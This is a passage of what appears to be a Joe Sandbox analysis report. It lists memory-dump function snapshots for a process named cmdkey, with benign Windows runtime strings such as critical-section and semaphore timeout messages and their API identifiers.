                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                Strings
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035402BD
                                                                • RTL: Re-Waiting, xrefs: 0354031E
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035402E7
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 03547B8E
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03547B7F
                                                                • RTL: Re-Waiting, xrefs: 03547BAC
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0354728C
                                                                Strings
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03547294
                                                                • RTL: Resource at %p, xrefs: 035472A3
                                                                • RTL: Re-Waiting, xrefs: 035472C1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280